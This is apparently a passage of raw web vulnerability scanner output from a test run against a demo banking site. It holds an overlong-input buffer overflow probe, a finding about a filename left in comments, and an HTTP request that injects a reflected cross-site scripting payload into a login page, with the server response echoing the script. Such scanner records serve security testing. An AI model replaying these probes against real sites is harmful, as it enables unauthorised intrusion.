aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa">BufferOverflow Link</A>
</P> </BODY>
</HTML>Existing filename found in commentsA URL or filename was found in the comments of the file and found to exist.Remove the comment.GET <var name="path"/> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
GET /banklogin.asp?err=--><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:05 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4947
Content-Type: text/html
Cache-control: private
Set-Cookie: state=; path=/
Set-Cookie: userid=; path=/
Set-Cookie: username=; path=/
Set-Cookie: sessionid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER>--><script>alert('XSS')</script><br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
